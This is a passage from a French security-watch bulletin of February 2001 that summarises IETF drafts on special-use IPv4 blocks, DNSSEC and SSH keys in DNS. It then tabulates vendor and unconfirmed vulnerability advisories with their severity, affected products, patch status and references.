Special Use IPv4 Address Blocks Ce document de synthèse présentant la spécificité de certaines plages d'adresse IP avait été retiré des archives et de la liste des drafts, le délai de validité de 6 mois ayant été dépassé. Ce problème d'accessibilité d'un document devant être considéré comme document de référence vient d'être résolu par la publication d'une 'nouvelle' version. 'Documenting Special Use Ipv4 Address blocks', draft de 3 pages, propose un récapitulatif clair, précis et fort bien documenté des caractéristiques de certaines plages d'adresse Ipv4: 0.0.0.0/8 adresses historiques de broadcast 127.0.0.0/8 adresses de 'LoopBack' 192.0.2.0/24 adresses de test (Bloc TEST-NET) 10.0.0.0/8 adresses RFC1918 non routables sur l'INTERNET 172.16.0.0/12 192.168.0.0/16 169.254.0.0/16 adresses utilisables en mode DHCP dégradé non routable sur l'INTERNET Classe D adresses de multicast Classe E adresses dont l'utilisation n'a jamais été clairement spécifiée Un exemple de liste de contrôle d'accès traitant la problématique liée aux caractéristiques de ces plages est proposé par Bill Manning, l'auteur du Draft: ... Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 19/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 access-list 100 deny ip host 0.0.0.0 any access-list 100 deny ip 127.0.0.0 0.255.255.255 255.0.0.0 0.255.255.255 access-list 100 deny ip 10.0.0.0 0.255.255.255 255.0.0.0 0.255.255.255 access-list 100 deny ip 172.16.0.0 0.15.255.255 255.240.0.0 0.15.255.255 access-list 100 deny ip 192.168.0.0 0.0.255.255 255.255.0.0 0.0.255.255 access-list 100 deny ip 192.0.2.0 0.0.0.255 255.255.255.0 0.0.0.255 access-list 100 deny ip 169.254.0.0 0.0.255.255 255.255.0.0 0.0.255.255 access-list 100 deny ip 240.0.0.0 15.255.255.255 any access-list 100 permit ip any any ... Ce document doit figurer en bonne place dans la bibliothèque de référence de tout exploitant d'un réseau IP ! ftp://ftp.nordu.net/internet-drafts/draft-manning-dsua-06.txt DRAFT-LEWIS-STATE-OF-DNSSEC-00 Notes from the State-Of-The-Technology: DNSSEC Publié en tant que draft de l'IETF, ce document contient la synthèse des idées échangées lors d'une réunion plénière des groupes de normalisation ayant à travailler dans le domaine de la sécurité du DNS (DNSSEC). Historiquement inscrit au programme d'étude de deux groupes complémentaires, les résultats des premiers travaux ont conduit à l'édition du RFC 2535 'Domain Name System Security Extensions'. Les principes développés ont ensuite été intégrés partiellement dans l'implémentation ISC BIND V8.2, la version 9.0 étant la première implémentation totalement conforme au RFC 2535. La terminologie DNSSEC ne désigne pas une technologie monolithique mais plutôt un ensemble de composantes techniques et méthodologiques qui, une fois assemblées, permettront d'offrir un service de nom sûr. Cependant, la vitesse de progression des travaux diffère d'une composante à l'autre. C'est notamment le cas du mécanisme de signature des transferts (TSIG ou Transaction SIGnature) qui a désormais atteint un niveau de maturité autorisant le déploiement. A ce jour, quatre composantes sont intégrées à DNSSEC qui répondent à quatre besoins différenciés: 1. La sécurité de l'ensemble du trafic à l'échelle de l'INTERNET: utilisation d'un mécanisme de signature digitale (RFC 3008 - 'Domain Name System Security Signing Autority'), 2. La sécurisation des requêtes et réponses à une échelle locale mais nécessitant un bon niveau de performance: utilisation du mécanisme de signature TSIG (RFC 2845 - 'Secret Key Transaction Authentication for DNS'), 3. La protection des mises à jour dynamique d'un serveur de nom: utilisation du même mécanisme TSIG (RFC 3007 - 'Secure Domain System Dynamic Update'), 4. Enfin, le stockage et la distribution d'éléments de sécurité: définition de la ressource dédiée CERT (RFC 2538 'Storing Certificate in the Domain Name System') Les sociétés ou organismes suivant étaient représentés lors de la réunion plénière, chacun ayant la responsabilité d'un domaine: NLnet LABS (US) en charge de l'étude des procédures liées à la gestion des clefs associées aux TLD (Top Level Domain), Verisign (US) en charge de l'étude des services associés à DNSSEC dont la validation des clefs des domaines délégués, la Foundation for Internet Infrastructure (suède) responsable de l'examen des problèmes administratifs liés à DNSSEC mais aussi des outils d'aide au déploiement le RSSAC (Root Server System Advisory Commitee) dont l'étude a permis de validé la maturité du mécanisme TSIG, le CAIRN (Collaborative Advanced Interagency Research Network) qui étudie les moyens de maintenir une chaîne de confiance lorsque qu'une partie de l'arborescence DNS n'est plus active ou non encore sécurisée, le NIST qui collecte des mesures de performance afin de vérifier la capacité du DNS existant à supporter la charge supplémentaire induite par les mécanismes DNSSEC, la DISA (US Defense Information Systems Agency) supporte les coûts d'intégration de DNSSEC dans l'implémentation BIND dans l'optique de déployer la version sécurisé au sein de la Défense américaine, le RIPE NCC qui s'intéresse plus particulièrement au déploiement de DNSSEC dans le domaine dédié à la résolution inverse 'in-addr.arpa', NAI qui est le premier membre qui ne soit pas un FAI à mettre en œuvre un DNS conforme à DNSSEC sur le domaine 'tislabs.com', Ip6.int dont les serveurs de racine sont en cours de migration pour supporter les enregistrements CERT et TSIG, TBDS (Topology Based Domain Search) qui étudie les techniques permettant au futur DNS de continuer à fonctionner en zones susceptibles d'être déconnectées. Nous noterons que si les intentions des groupes de travail sont louables - la présente note d'information le démontre - il semble cependant que les travaux en cours visent plus à corriger, localement et au coup par coup, les défaillances d'un procotole (voire d'une infrastructure) devenu vitale. Le problème de fond n'est pas de savoir si l'on peut faire évoluer et sécuriser cette infrastructure tentaculaire mais plutôt de savoir combien de temps celle-ci Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 20/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 résistera aux multiples aménagements. En un mot, ne va-t-on pas vers une fragilisation globale du système en tentant de l'aménager sans envisager de le remplacer ? ftp://ftp.nordu.net/internet-drafts/draft-lewis-state-of-dnssec-00.txt DRAFT-GRIFFIN-SSH-HOST-KEYS-IN-DNS-00 Storing SSH Host Keys in DNS L'une des extensions du DNS décrites dans le RFC 2535 'Domain Name System Security Extensions' peut être mise à profit pour créer une infrastructure - privée ou publique - de stockage et de distribution d'éléments de sécurité. Ainsi, l'auteur du document 'Storing SSH Host Keys in DNS' suggère d'utiliser la ressource KEY comme lieu de stockage des clefs publiques des serveurs utilisant le service SSH. L'objectif est double: offrir à la fois un service simple et efficace permettant à la fois de distribuer les clefs et de contrôler l'authenticité de celles-ci. Un tel service permettrait de contrer les attaques de type 'man-in-the-middle' en offrant un moyen de vérification alternatif pour ne pas dire de confiance car partagé par un grand nombre d'utilisateurs. Rappelons qu'une attaque de ce type, portant sur SSL et basée sur l'acceptation 'aveugle' d'un certification invalide, a défrayée la chronique dernièrement. Deux méthodes de vérification de l'authenticité et de l'intégrité de la clef sont exploitables: 1. Par la vérification de la zone DNSSEC contenant le nom du système. Ceci suppose que le client soit configuré pour assurer cette vérification, et dispose en conséquence, de la clef de la dite zone, 2. Effectuer une requête sécurisée - méthode SIG(0) (RFC 2931) ou TSIG (RFC 2845) - vers un serveur de nom. Cette proposition a le mérite de fournir une solution simple et efficace car intégrée à un service indispensable au bon fonctionnement du protocole SSH. Bien entendu, cette solution nécessite que les serveurs SSH soient inscrits dans une zone DNS sécurisée et gérée par un DNS conforme à la spécification DNSSEC. Les clients SSH devront être adaptés pour traiter assurer un contrôle systématique de l'authenticité de la clef publique avant utilisation. ftp://ftp.nordu.net/internet-drafts/draft-griffin-ssh-host-keys-in-dns-00.txt Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 21/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 ALLEER RT TE ES SE ET T AT TT TA AQ QU UE ES S ALERTES GUIDE DE LECTURE La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en forme de ces informations peuvent être envisagées : Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de l’origine de l’avis, Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles. La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une synthèse des avis classée par organisme émetteur de l’avis. Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d'un synoptique résumant les caractéristiques de chacun des sources d’information ainsi que les relations existant entre ces sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel et publiquement accessible sont représentés. Avis Spécifiques Constructeurs Réseaux 3Com Cisco Systèmes Avis Généraux Editeurs Systèmes Compaq Indépendants Editeurs Linux Hackers Microsoft HP FreeBSD IBM NetBSD SGI OpenBSD SUN SCO l0pht Netscape rootshell Editeurs Organismes Autres US Autres Aus-CERT AXENT BugTraq CERT ISS @Stake CIAC Typologies des informations publiées Publication de techniques et de programmes d’attaques Détails des alertes, techniques et programmes Synthèses générales, pointeurs sur les sites spécifiques Notifications détaillées et correctifs techniques L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes : Recherche d’informations générales et de tendances : Lecture des avis du CERT et du CIAC Maintenance des systèmes : Lecture des avis constructeurs associés Compréhension et anticipation des menaces : Lecture des avis des groupes indépendants Aus-CERT CERT 3Com Compaq Microsoft BugTraq rootshell AXENT NetBSD Cisco HP Netscape @Stake l0pht ISS OpenBSD IBM Xfree86 SGI Linux SUN FreeBSD CIAC Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 22/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 FORMAT DE LA PRÉSENTATION Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme de tableaux récapitulatifs constitués comme suit: Présentation des Alertes EDITEUR TITRE Description sommaire Gravité Date Informations concernant la plate-forme impactée Produit visé par la vulnérabilité Description rapide de la source du problème Correction URL pointant sur la source la plus pertinente Référence Présentation des Informations SOURCE TITRE Description sommaire URL pointant sur la source d'information SYNTHESE MENSUELLE Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille. L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution. Période du 27/01/2001 au 23/02/2001 Organisme CERT-CA CERT-IN CIAC Constructeurs Cisco HP IBM SGI Sun Editeurs Allaire Microsoft Netscape Sco Unix libres Linux RedHat Linux Debian Linux Mandra. FreeBSD Autres @Stake Safer X-Force Période 21 2 0 19 10 1 6 2 0 1 10 0 9 0 1 34 6 8 7 13 4 3 0 1 Cumul 2001 2000 25 118 3 22 1 10 21 86 14 77 1 13 8 28 3 17 0 12 2 7 15 155 2 32 12 100 0 7 1 16 76 226 10 137 20 66 23 -23 23 11 38 5 10 4 1 2 27 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Cumul 2001 - Constructeurs SGI 0% Sun 14% IBM 21% Cisco 7% HP 58% Cumul 2001 - Editeurs Netscape Sco Allaire 0%7% 13% Microsoft 80% Cumul 2000 - Constructeurs SGI 16% IBM 22% Sun 9% Cisco 17% HP 36% Cumul 2000 - Editeurs Netscape 5% Sco 10% Allaire 21% Microsoft 64% Page 23/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 ALERTES DÉTAILLÉES AVIS OFFICIELS Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s'il y en a, doivent immédiatement être appliqués. BORDERWARE Déni de service contre 'Borderware' Il est possible de provoquer à distance un déni de service sur les serveurs fonctionnant avec 'Borderware'. Forte 26/01 Borderware firewall server version 6.1.2 Réponse aux requêtes 'ping' en broadcast Correctif existant Serveur 'ping' http://www.securityfocus.com/archive/1/158746 Bugtraq CERT Vulnérabilités multiples dans 'BIND' Le CERT annonce, en coopération avec Covert Labs, quatre vulnérabilités dans BIND. Critique 29/01 ISC BIND versions 4.9.x inférieures à 4.9.8ISC BIND versions 8.2.x inférieures à 8.2.3 Mauvaise initialisation des variables Correctif existant BIND 8: TSIG CERT CA-2001-02 CIAC L-030 ISC BIND PGP COVERT Labs Bugtraq Débordement de buffer BIND 4: nslookupComplain() Non vérification des paramètres d'entrée BIND 4: nslookupComplain() Accès à la pile programme BIND X: Pile programme http://www.cert.org/advisories/CA-2001-02.html http://ciac.llnl.gov/ciac/bulletins/l-030.shtml http://www.isc.org/products/BIND/bind-security.html http://www.pgp.com/research/covert/advisories/047.asp http://www.securityfocus.com/bid/2302http://www.securityfocus.com/bid/2302 COMPAQ Vulnérabilité dans 'Compaq Web-Enabled Management' Une vulnérabilité de type débordement de buffer, exploitable à distance, peut mener un utilisateur à acquérir les droits root ou administrateur. Forte 07/02 WebManagement sur architecture Intel ou Alpha: Windows 9x, NT, 2000, NetWare, SCO Open Server, SCO Correctif existant Compaq CIAC UnixWare 7, RedHat 6.2 et 7.0, Tru64Unix, OpenVMS Web-Enabled Management' Erreur dans la vérification de la taille des données http://www.compaq.com/products/servers/management/agentsecurity.html http://ciac.llnl.gov/ciac/bulletins/l-042.shtml CISCO Vulnérabilités dans CSS (Cisco Content Services) Deux vulnérabilités existent dans les commutateurs CSS, aussi appelés 'Arrowpoint'. Forte 31/01 Cisco CSS 11050, CSS 11150 et CSS 11800 Débordement de buffer Correctif existant Cisco WebNS http://www.cisco.com/warp/public/707/arrowpoint-cli-filesystem-pub.shtml CSCdt08730 CSCdt12748 FreeBSD Vulnérabilité dans 'inetd' (serveur 'ident') Il est possible de lire à distance une partie de certains fichier via le serveur ident. Moyenne 29/01 FreeBSD 3.x (toutes versions)FreeBSD 4.x (toutes versions) Non disponible Correctif existant 'inetd' (serveur 'ident') http://www.linuxsecurity.com/advisories/freebsd_advisory-1107.html FreeBSD-SA01:11 http://www.ciac.org/ciac/bulletins/l-038.shtml CIAC L-030 HP Vulnérabilité dans le 'JRE' de SUN (sous MPE/ix) HP émet son propre bulletin afin d'orienter les utilisateurs sous MPE/ix vers les versions immunes de 'JRE'. Critique 20/02 MPE/iX versions 6.0, 6.5 ou 7.0 sous HP e3000 Non disponible Correctif existant Java Runtime Environment HPSBMP0102-010 http://home2.itrc.hp.com/hm/ http://www.securityfocus.com/archive/1/164387 Bugtraq Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 24/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 Vulnérabilité dans 'NM debug' Un utilisateur peut acquérir certains privilèges en utilisant 'NM Debug'. Forte 20/02 MPE/iX versions 5.5 et supérieures sous HP3000 Non respect des points d'arrêt Correctif existant 'NM Debug' HPSBMP0102-008 http://home2.itrc.hp.com/hm/ http://www.securityfocus.com/archive/1/164387 Bugtraq Vulnérabilité dans 'linkeditor' Un utilisateur peut acquérir certains privilèges réservés à l'administrateur système grâce à 'linkeditor'. Forte 20/02 MPE/iX versions 5.5 et supérieures sous HP3000 Non disponible Correctif existant 'linkeditor' HPSBMP0102-009 http://home2.itrc.hp.com/hm/ http://www.securityfocus.com/archive/1/164387 Bugtraq Vulnérabilité dans 'man' Il existe une vulnérabilité dans la commande 'man' pouvant conduire un utilisateur à provoquer un déni de service. Forte 29/01 HP9000 Series 700 et 800 sousHP-UX versions 11.00, 11.04, 10.20, 10.24, 10.10 et 10.01 Non disponible Correctif existant Commande 'man' HPSBUX0101-138 http://europe-support.external.hp.com/ http://ciac.llnl.gov/ciac/bulletins/l-034.shtml CIAC L-030 Vulnérabilité dans 'iPlanet 4.x' Une vulnérabilité exploitable à distance rend instable 'iPlanet 4.x' avec VirtualVault 4.0 lors de requêtes https. Forte 11/02 HP-UX 11.04 (VVOS) avec VirtualVault A.04.00 surHP9000 Series 7/800 Non disponible Correctif existant iPlanet Web Server HPSBUX0102-139 http://europe-support.external.hp.com/ Débordement de buffer dans plusieurs éditeurs de texte HP vient de publier un bulletin annonçant un débordement de buffer dans plusieurs éditeurs de texte. Moyenne 15/02 HP-UX versions 11.00, 11.04, 10.20, 10.24, 10.10 et 10.01sur HP9000 Séries 700 et 800 Non vérification des paramètres Correctif existant Editeurs de texte HPSBUX0102-140 http://europe-support2.external.hp.com/ LINUX Déni de service dans 'proftpd' Un utilisateur distant peut provoquer un déni de service sur ProFTPD via les commandes 'SIZE' ou 'USER'. Forte 08/02 Linux Mandrake 7.2 et Debian GNU/Linux 2.2 Surconsommation de mémoire Correctif existant Commandes 'SIZE' ou 'USER' http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-021.php3 MDKSA2001:021 http://www.debian.org/security/2001/dsa-029 DSA-029-1 Deux vulnérabilités noyau dans 'sysctl' et 'ptrace' Deux vulnérabilités affectent localement les paquetages 'sysctl' et 'ptrace' des noyaux Linux 2.2 et 2.4. Forte 08/02 Immunix OS 6.2 et 7.0-beta, OpenLinux 2.3, eServer 2.3.1, eBuilderOpenLinux eDesktop 2.4 Mauvaise vérification des données passées en paramètres Correctif existant sysctl CSSA-2001-009.0 2001-70-002-01 ptrace Conflit d'accès au ressources (race condition) http://www.linuxsecurity.com/advisories/caldera_advisory-1141.html http://www.linuxsecurity.com/advisories/other_advisory-1147.html LINUX DEBIAN Plusieurs vulnérabilités dans 'xfree86-1' Plusieurs vulnérabilités dans 'xfree86-1' de type débordement de buffer, déni de service, 'symlink' peuvent être exploitées à distance. Critique 12/02 Linux Debian 2.2, 2.2r1, (2.2r2) (cf. Description) Correctif existant Paquetage 'xfree86-1' http://www.debian.org/security/2001/dsa-030 DSA-030-1 http://www.securityfocus.com/archive/1/162285 Bugtraq LINUX MANDRAKE Débordement de buffer dans 'XEmacs' Un débordement de buffer dans 'XEmacs' permet à un utilisateur distant d'éxécuter du code. Forte 01/02 Linux Mandrake versions 6.0, 6.1, 7.0, 7.1, 7.2 etCorporate Server 1.0.1 Mauvaise vérification des données passées Correctif existant 'magic cookie' MDKSA-2001:019 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-019.php3 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 25/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 Déni de service dans 'cups' Un utilisateur distant peut provoquer un déni de service dans l'application 'cups' Forte 01/02 'cups' versions inférieures à 1.1.5 sous Linux Mandrake 7.2 Mauvaise vérification des données passées en entrée Correctif existant Fonction 'httpGets()' MDKSA-2001:020 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-020.php3 LINUX REDHAT Problème dans 'inetd' lors de la fermeture des sockets Un problème existe dans 'inetd' lors de la fermeture des sockets. Moyenne 30/01 Red Hat Linux 6.2 (alpha, i386, sparc) Mauvaise fermeture des sockets Correctif existant 'inetd' http://www.linuxsecurity.com/advisories/redhat_advisory-1118.html Linux Security Débordement de buffer dans 'crontab' Une vulnérabilité dans 'cron' permet d'obtenir localement des droits privilégiés. Moyenne 19/02 Red Hat Linux 5.2, 6.2, 7.0 Mauvaise gestion des données Correctif existant Commande 'crontab' http://www.linuxsecurity.com/advisories/redhat_advisory-1159.html 2001:014-03 LINUX SuSE Vulnérabilité dans 'kdesu' Il est possible d'acquérir le mot de passe 'root'. Moyenne 29/01 SuSE 6.0, 6.1, 6.2, 6.3, 6.4, 7.0 Option 'keep password' Correctif existant Paquetage 'kdesu' SuSE-SA:2001:02 http://lists.suse.com/archives/suse-security-announce/2001-Jan/0001.html MICROSOFT Déni de service sur les serveurs Windows 2000 via RDP Un utilisateur peut provoquer à distance un déni de service sur les serveurs Windows 2000 en utilisant le protocole RDP (Remote Desktop Protocol). Critique 31/01 Microsoft Windows 2000 (Server, Advanced Server) Mauvaise gestion de certains paquets Correctif existant Protocole RDP http://www.microsoft.com/technet/security/bulletin/fq01-006.asp MS01-006 Vulnérabilité dans 'Network DDE' Une vulnérabilité dans 'Network DDE' peut conduire un utilisateur local à acquérir des privilèges plus élevés sous Windows 2000. Critique 05/02 Microsoft Windows 2000 Professional, Server et Advanced Server Exécution de requêtes dans le contexte de sécurité 'LocalSystem' Correctif existant Network DDE http://www.microsoft.com/technet/security/bulletin/fq01-007.asp MS01-007 http://ciac.llnl.gov/ciac/bulletins/l-044.shtml CIAC L-044 Vulnérabilité dans 'Windows Media Player' (WMP) Une vulnérabilité affectant 'Microsoft Windows Media Player 7' permet d'exécuter du code sur la machine cible via un site web malicieux distant. Critique 15/02 Microsoft Windows Media Player 7 'skins' au format '.wmz' Non vérification des 'skins' téléchargées Correctif existant http://www.microsoft.com/technet/security/bulletin/fq01-010.asp MS01-010 Vulnérabilité dans 'Outlook' et 'Outlook Express' Une vulnérabilité de type débordement de buffer, exploitable à distance, affecte 'Outlook' et 'Outlook Express'. Forte 23/02 Microsoft Outlook 97 et 2000Microsoft Outlook Express 5.01 et 5.5 Mauvaise gestion des erreurs lors de l'analyse de 'vCards' Correctif existant Gestion des 'vCards' http://www.microsoft.com/technet/security/bulletin/MS01-012.asp MS01-012 Vulnérabilité dans le traitement des scripts '.HTR' Il est possible de lire à distance une partie spécifique de certains fichiers d'un serveur web. Il n'est cependant pas possible d'ajouter, modifier ou effacer un fichier. Forte 29/01 Microsoft Internet Information Server 4.0Microsoft Internet Information Service 5.0 Non traitement des fichiers 'ASP' (Active Server Pages) Correctif existant Extension ISAPI '.HTR' http://www.microsoft.com/technet/security/bulletin/fq01-004.asp MS01-004 Vulnérabilité dans le service 'NTLMSSP' Il est possible, à un utilisateur local, d'exécuter un code de son choix sous les droits 'LocalSystem'. Forte 07/02 Microsoft Windows NT 4.0 WorkstationMicrosoft Windows NT 4.0 Server Correctif existant NTLM Security Support Provider Exécution de code par le service 'NTLMSSP' sous les droits'LocalSystem' http://www.microsoft.com/technet/security/bulletin/fq01-008.asp MS01-008 http://ciac.llnl.gov/ciac/bulletins/l-043.shtml CIAC L-043 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 26/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 Déni de service dans le protocole 'PPTP' Un utilisateur peut provoquer à distance un déni de service sur les serveurs Windows NT 4.0 via le protocole 'PPTP'. Forte 13/02 Microsoft Windows NT 4.0 Server, Enterprise Edition, Terminal Server Edition Mauvaise gestion des paquets 'PPTP' malformés Correctif existant Protocole 'PPTP' http://www.microsoft.com/technet/security/bulletin/fq01-009.asp MS01-009 Déni de service sur les contrôleurs de domaines Il est possible de provoquer à distance un déni de service sur les contrôleurs de domaines sous Windows 2000 Server. Forte 21/02 Microsoft Windows 2000 Server , Advanced Server, Datacenter Server Mauvaise gestion des paquets mal formés Correctif existant Contrôleur de domaine http://www.microsoft.com/technet/security/bulletin/MS01-011.asp MS01-011 Anomalies lors de l'installation de certains correctifs Des anomalies peuvent apparaître lors de l'installation de certains correctifs dans la version en langue Anglaise de Windows 2000. Moyenne 31/01 Windows 2000 (Professional, Server, Advanced Server) Erreur dans les numéro de version des catalogues des SP Windows 2000 Correctif existant Catalogue système http://www.microsoft.com/technet/security/bulletin/fq01-005.asp MS01-005 Erreur! Signet non défini. CIAC L-041 NetBSD Vulnérabilité dans la validation des arguments 'LDT' Une vulnérabilité dans la validation des arguments permet localement d'ajouter des segemnts à la Table de Descripteurs Locale (LDT). Forte 16/02 Toutes les versions de NetBSD sur architecture Intel i386 Erreur de conception Correctif existant Appel système 'i386_set_ldt' http://www.linuxsecurity.com/advisories/netbsd_advisory-1157.html Linux Security OPENSSH Contournement d'authentification dans 'OpenSSH-2.3.1' Il est possible de se connecter sans s'authentifier dans la version de 'OpenSSH-2.3.1'. Critique 08/02 OpenSSH-2.3.1 Inexistance du processus d'authentification(challenge/response) Correctif existant OpenSSH-2.3.1 http://www.linuxsecurity.com/advisories/openbsd_advisory-1148.html Linux Security OpenBSD Débordement de buffer dans 'sudo' Une vulnérabilité de type débordement de buffer affecte 'sudo'. Forte 22/02 OpenBSD 2.8 Non disponible Correctif existant 'sudo' http://www.openbsd.org/errata.html#sudo OpenBSD SCRIPT PHP Vulnérabilité dans 'NewsDaemon' Une vulnérabilité dans 'NewsDaemon' peut conduire un utilisateur distant à gagner les droits 'administrateur'. Forte 16/02 'NewsDaemon' versions inférieures à la 0.21b Mauvaise vérification des paramètres passés en entrée Correctif existant Script PHP 'NewsDaemon' http://www.securiteam.com/unixfocus/NewsDaemon_remote_administrator_access.html Securiteam SSH1 Vulnérabilité dans le détecteur d'attaques 'deattack.c' Une vulnérabilité présente dans la plupart des implémentations de SSH1 permet à un utilisateur d'exécuter du code distant sur un client ou un serveur SSH. Critique 08/02 OpenSSH versions inférieures à 2.3.0SSH version ssh-1.2.24 à ssh-1.2.31F-Secure SSH-1.3.xOSSH 1.5.7 Depassement de capacité d'une donnée Correctif existant 'deattack.c' http://www.linuxsecurity.com/advisories/other_advisory-1149.html Linux Security SUN Vulnérabilité dans 'JRE' (Java Runtime Environment) Une vulnérabilité, présente dans certaines version de 'JRE', peut amener un code malicieux à exécuter certaines commandes non autorisées. Critique 21/02 Se référer à l'avis pour la liste des palet-formes Non disponible Correctif existant Java Runtime Environment http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/200&type=0&nav=sec.sba SUN #00201 http://www.securityfocus.com/archive/1/164577 Bugtraq Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 27/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 TURBOLINUX Vulnérabilité dans 'sendmail' Il est possible de provoquer localement un débordement de buffer lorsque 'sendmail' est lancé avec une option particulière. Forte 21/02 Toutes les versions jusqu'à 'sendmail-8.11.2-5' inclus Exception de type 'segmentation fault' Correctif existant Option '-bt' de 'sendmail' http://www.turbolinux.com/pipermail/tl-security-announce/2001-February/000033.html TLSA2001003-1 VIRUS Apparition et propagation du virus A. Kournikova Un virus de type ver, appelé VBS Anna Kournikova se répand actuellement sur l'Internet. Forte 13/02 Toute plate-forme Windows avec Microsoft Outlook installéet autorisant l'exécution de scripts VBS Exécution de scripts VBS Correctif existant Virus CERT CA-2001-03 http://www.cert.org/advisories/CA-2001-03.html http://ciac.llnl.gov/ciac/bulletins/l-046.shtml CIAC L-046 FECCIRC 2001-03 http://www2.fedcirc.gov/advisories/FA-2001-03.html WATCHGUARD Déni de service dans les pare-feux Firebox II via PPTP Un utilisateur distant peut provoquer un déni de service en soumettant au pare-feu des paquets PPTP malformés. Forte 14/02 Watchguard Firebox IIFirmware Policy manager V4.50-B1780, Watchguard product V4.50-612 Mauvaise gestion des paquets 'PPTP' malformés Correctif existant Protocole 'PPTP' http://www.securityfocus.com/archive/1/162965 Bugtraq WINGATE Vulnérabilité dans 'Wingate' Une vulnérabilité présente dans 'Wingate' permet à un utilisateur distant d'utiliser des services sans authentification préalable. Critique 25/01 Wingate 4.1.1 sur Windows NT 4.0 Adresse de loopback considérée comme authentifiée Correctif existant Configuration par défaut http://www.securityfocus.com/archive/1/158735 Bugtraq ALERTES NON CONFIRMEES Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes d’information mais n’ont pas encore fait l’objet d’une annonce ou d'un correctif de la part de l'éditeur. Ces alertes nécessitent la mise en place d’un processus de suivi et d’observation. AOL Vulnérabilité dans 'AOLserver' Un utilisateur distant peut avoir accès à certains fichiers hors du répertoire racine d'un serveur 'AOLserver'. Moyenne 06/02 AOLserver 3.2 AOLserver 3.2 Mauvaise vérification des paramètres soumis (URLs) Aucun correctif http://www.securityfocus.com/bid/2343 Bugtraq AT&T Vulnérabilité dans le client et le serveur 'WinVNC' Une vulnérabilité exploitable à distance affecte les applications client et serveur de 'WinVNC'. Forte 29/01 WinVNC Client et Server de version antérieure ou égale à 3.3.3r7 Client: Paquet 'rfbConnFailed' Mauvaise gestion des données 'rfbConnFailed' Aucun correctif Bugtraq Serveur: Mode debug Mauvaise journalisation des données HTTP http://www.securityfocus.com/bid/2305 BORDERWARE Déni de service contre 'Borderware' Il est possible de provoquer à distance un déni de service sur les serveurs fonctionnant avec 'Borderware'. Forte 26/01 Borderware firewall server version 6.1.2 Réponse aux requêtes 'ping' en broadcast Correctif existant Serveur 'ping' http://www.securityfocus.com/archive/1/158746 Bugtraq Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 28/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 FORE/MARCONI Déni de service contre les commutateurs 'ASX' Il est possible de provoquer à distance un déni de service sur les commutateurs 'ASX'. Forte 19/02 Commutateurs ASX-1000 avec ForeThought 6.2 Protocole (connexion SYN FIN) Mauvaise gestion des paquets mal formés Aucun correctif http://www.securityfocus.com/archive/1/163949 Bugtraq GOAHEAD Vulnérabilité dans 'GoAhead WebServer' Exécution de code et avoir accès distant à certains fichiers sur un serveur web 'GoAhead WebServer' vulnérable. Forte 05/02 GoAhead WebServer 2.0 et 2.1 Serveur Web Mauvaise vérification des paramètres Aucun correctif http://www.securityfocus.com/bid/2334 Bugtraq IBM Vulnérabilités dans 'NetCommerce' En soumettant une URL spécialement conçue, un utilisateur distant peut accéder à certaines informations sensibles. Forte 07/02 IBM NetCommerce versions 3.0 et 3.1.2 Macros activées par défaut Exécution des macros Aucun correctif http://www.securiteam.com/securitynews/IBM_NetCommerce_security_vulnerability.html Securiteam LOTUS IBM Vulnérabilité dans 'Lotus Notes' Une vulnérabilité dans 'Lotus Notes' peut mener utilisateur expérimenté à manipuler les courriers afin de provoquer l'exécution de code distant chez le destinataire. Critique 08/02 Validé sur Lotus Notes V4.6. Les autres versions sont probablement aussi affectées par cette vulnérabilité. Formulaires PostOpen & Launch Erreur de conception Aucun correctif http://www.securityfocus.com/archive/1/161784 